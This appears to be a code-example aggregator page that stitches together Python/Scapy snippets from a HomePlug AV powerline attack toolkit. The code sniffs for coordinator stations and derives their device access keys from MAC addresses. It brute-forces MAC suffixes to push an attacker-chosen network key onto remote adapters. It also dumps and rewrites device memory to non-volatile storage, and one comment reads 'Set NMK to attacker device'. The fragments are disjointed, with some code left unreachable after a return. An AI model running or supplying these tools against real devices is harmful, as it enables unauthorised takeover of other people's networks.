def setNMK(interface, mac, nmk):
    # Building packet
    pkt = Ether(dst=mac, ) / HomePlugAV() / SetEncryptionKeyRequest(
        NMK=nmk, DestinationMAC=mac, EKS=1, PayloadEncKeySelect=0x0f, DAK=0)
    # Sending packet and capturing answer
    ans = srp1(pkt, iface=interface, verbose=False)
    # Checking if operation succeeded
    if ans.haslayer(SetEncryptionKeyConfirmation):
        return True
    return False
def checkAVLN(interface, mac):
    # Building packet
    pkt = Ether(dst=mac, ) / HomePlugAV() / NetworkInformationRequest()
    # Sending packet
    ans = srp1(pkt, iface=interface, verbose=False)
    # Checking answer to determine if STA is member of an AVLN
    if ans.haslayer(NetworkInfoConfirmationV10) or ans.haslayer(
            NetworkInfoConfirmationV11):
        if ans[NetworkInfoConfirmationV10].LogicalNetworksNumber > 0:
            return True

    return False
Exemple #3
0
def dump_all(src, dst, iface):
    offset = 0
    length = 0x400
    buff_ = ""
    etherhome = Ether(src=src, dst=dst)/HomePlugAV()
    pkt = etherhome/ReadModuleDataRequest(Offset=offset, Length=length)
    res = srp1(pkt, iface=iface)
    tModuleData = ModulePIB(res.ModuleData, offset, length)
    PIBlen = tModuleData.PIBLength
    nbreq = PIBlen/length
    for i in range(0, nbreq*length, length):
        pkt = etherhome/ReadModuleDataRequest(Offset=i, Length=length)
        res = srp1(pkt, iface=iface)
        buff_ += res.ModuleData
    pkt = etherhome/ReadModuleDataRequest(Offset=i+length, Length=(PIBlen-nbreq*length))
    res = srp1(pkt, iface=iface)
    buff_ += res.ModuleData
    return buff_
Exemple #4
0
def rewrite_all(
    data_,
    dest,
    src,
    iface,
):
    offset = 0
    length = 0x400
    etherhome = Ether(src=src, dst=dest) / HomePlugAV()
    nbreq = len(data_) / length
    for i in range(0, nbreq * length, length):
        pkt = etherhome / WriteModuleDataRequest(
            Offset=i, ModuleData=data_[i:i + length])
        res = srp1(pkt, iface=iface)
    pkt = etherhome / WriteModuleDataRequest(Offset=i + length,
                                             ModuleData=data_[i + length:])
    res = srp1(pkt, iface=iface)
    # Write Data -> NVM
    pkt = etherhome / WriteModuleData2NVMRequest()
    res = srp1(pkt, iface=iface)
    if res.haslayer("WriteModuleData2NVMConfirmation"):
        if res[WriteModuleData2NVMConfirmation].Status == 0x0:
            return True
    return False
    if macad not in dictio.keys() and macad != "00:00:00:00:00:00":
        dictio[macad] = DAKgen(macad).generate()
        print "\t Found CCo: %s (DAK: %s)" % (macad, dictio[macad])


if __name__ == "__main__":
    usage = "usage: %prog [options] arg"
    parser = OptionParser(usage)
    parser.add_option(
        "-i",
        "--iface",
        dest="iface",
        default="eth0",
        help=
        "select an interface to Enable sniff mode and sniff indicates packets",
        metavar="INTERFACE")
    parser.add_option("-s",
                      "--source",
                      dest="sourcemac",
                      default="00:c4:ff:ee:00:00",
                      help="source MAC address to use",
                      metavar="SOURCEMARC")
    (options, args) = parser.parse_args()
    print "[+] Enabling sniff mode"
    pkt = Ether(src=options.sourcemac) / HomePlugAV() / SnifferRequest(
        SnifferControl=1)  # We enable Sniff mode here
    sendp(pkt, iface=options.iface)
    print "[+] Listening for CCo station..."
    sniff(prn=appendindic,
          lfilter=lambda pkt: pkt.haslayer(HomePlugAV))  # capture the signal
    usage = "usage: %prog [options] arg"
    parser = OptionParser(usage)
    parser.add_option("-i", "--iface", dest="iface", default="eth0",
        help="select an interface to Enable sniff mode and sniff indicates packets", metavar="INTERFACE")
    parser.add_option("-t", "--targets", dest="macaddress", default="",
        help="Targets MAC address bytes", metavar="MACBYTES")
    parser.add_option("-s", "--source", dest="sourcemac", default="00:c4:ff:ee:00:00",
        help="source MAC address to use", metavar="SOURCEMARC")
    parser.add_option("-k", "--key", dest="nmk", default="\x00"*16,
        help="NMK key to configure", metavar="NMK")


    (options, args) = parser.parse_args()
    arg = options.macaddress
    _bytes = [hex(x)[2:] for x in (range(0x100))]
    products = itertools.product(_bytes, repeat=(6-len(arg)/2))

    for x in products:
        cmac = '' 
        for y in range(len(x)):
            if len(x[y]) == 1:
                cmac += '0'+ x[y]
            else:
                cmac += x[y]
        newmac = arg + cmac
        keygen = DAKgen(newmac)
        DAKpass = keygen.generate()
        pbkdf1 = PBKDF1(DAKpass, DAK_SALT, 16, hashlib.sha256())    
        pkt = Ether(src=options.sourcemac)/HomePlugAV()/SetEncryptionKeyRequest(NMK=options.nmk, EKS=1, DAK=binascii.unhexlify(pbkdf1))
        sendp(pkt, iface=options.iface)
Exemple #7
0
                      default="00:c4:ff:ee:00:00",
                      help="source MAC address to use",
                      metavar="SOURCEMAC")
    parser.add_option("-k",
                      "--key",
                      dest="nmk",
                      default="\x00" * 16,
                      help="NMK key to configure",
                      metavar="NMK")

    (options, args) = parser.parse_args()
    arg = options.macaddress
    _bytes = [hex(x)[2:] for x in (range(0x100))]
    products = itertools.product(_bytes, repeat=(6 - len(arg) / 2))

    for x in products:
        cmac = ''
        for y in range(len(x)):
            if len(x[y]) == 1:
                cmac += '0' + x[y]
            else:
                cmac += x[y]
        newmac = arg + cmac
        keygen = DAKgen(newmac)
        DAKpass = keygen.generate()
        pbkdf1 = PBKDF1(DAKpass, DAK_SALT, 16, hashlib.sha256())
        pkt = Ether(
            src=options.sourcemac) / HomePlugAV() / SetEncryptionKeyRequest(
                NMK=options.nmk, EKS=1, DAK=binascii.unhexlify(pbkdf1))
        sendp(pkt, iface=options.iface)
def listen():
    sniff(prn=appendindic,
          lfilter=lambda pkt: pkt.haslayer(HomePlugAV),
          timeout=5)


if __name__ == "__main__":
    usage = "usage: %prog [options] arg"
    parser = OptionParser(usage)
    parser.add_option(
        "-i",
        "--iface",
        dest="iface",
        default="eth0",
        help=
        "select an interface to Enable sniff mode and sniff indicates packets",
        metavar="INTERFACE")
    parser.add_option("-s",
                      "--source",
                      dest="sourcemac",
                      default="00:c4:ff:ee:00:00",
                      help="source MAC address to use",
                      metavar="SOURCEMARC")
    (options, args) = parser.parse_args()
    tlisten = threading.Thread(None, listen, None)
    print "[+] Listening for confirmations..."
    tlisten.start()
    print "[+] Sending Get Device Type Requests"
    pkt = Ether(src=options.sourcemac) / HomePlugAV()
    sendp(pkt, iface=options.iface)
Exemple #9
0
                      help="MAC address of your local attached PLC",
                      metavar="LOCALDEVICE")
    parser.add_option("-k",
                      "--key",
                      dest="nmk",
                      default="\x00" * 16,
                      help="NMK key to configure",
                      metavar="NMK")

    (options, args) = parser.parse_args()
    if not options.localdevice:  # if localdevice is not given
        parser.error('Local Device MAC address not given')

    # Set NMK to attacker device
    zeroDAK = "\x00" * 16
    pkt = Ether(
        dst=options.localdevice) / HomePlugAV() / SetEncryptionKeyRequest(
            NMK=options.nmk,
            EKS=1,
            DAK=zeroDAK,
            DestinationMAC=options.localdevice,
            PayloadEncKeySelect=0x0f)
    ans = srp1(pkt, iface=options.iface, verbose=False, timeout=5)
    if ans is None:
        print "Packet sent with no answer..."
        exit(1)
    if ans[1].haslayer(SetEncryptionKeyConfirmation):
        print "Set NMK key with success!"
    else:
        print "There was an error while setting the NMK. Is the localdevice wired to your computer?"